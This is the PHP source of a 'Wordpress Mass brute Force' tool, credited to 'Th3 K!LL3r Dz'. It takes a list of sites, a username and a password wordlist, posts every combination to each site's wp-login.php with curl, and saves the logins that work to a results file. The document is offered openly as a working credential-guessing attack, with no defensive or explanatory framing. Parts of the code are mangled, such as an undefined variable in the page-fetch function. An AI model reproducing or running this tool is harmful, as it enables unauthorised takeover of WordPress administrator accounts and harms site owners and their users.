Wordpress Mass brute Force


User :

Sites list : Pass list :
'; @set_time_limit(0); if($_POST['x']){ echo "
"; $sites = explode("\n",$_POST["sites"]); // Get Sites By Th3 K!LL3r Dz ! $w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt By Th3 K!LL3r Dz ! $Attack = new Wordpress_brute_Force(); // Active Class foreach($w0rds as $pwd){ foreach($sites as $site){ $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D flush();flush(); } } } # Class & Function'z function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); } class Wordpress_brute_Force{ public function check_it($site,$user,$pass){ // print result if(eregi('profile.php',$this->post($site,$user,$pass))){ echo "# Success : $user:$pass -> $site/wp-admin/
"; $f = fopen("Wp-Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/\n"); fclose($f); flush(); }else{ echo "# Failed : $user:$pass -> $site
"; flush();} } public function post($site,$user,$pass){ // Post -> user & pass $login =$site.'/wp-login.php'; $to = $site.'/wp-admin'; $token = $this->extract_token($site); $log = array ('Log In','دخول'); $data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1); $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$login); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,$data); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } public function extract_token($site){ // get token from source for -> function post $source = $this->get_source($site); preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token); return $token[1][0]; } public function get_source($site){ // get source for -> function extract_token $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$login); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } } ?>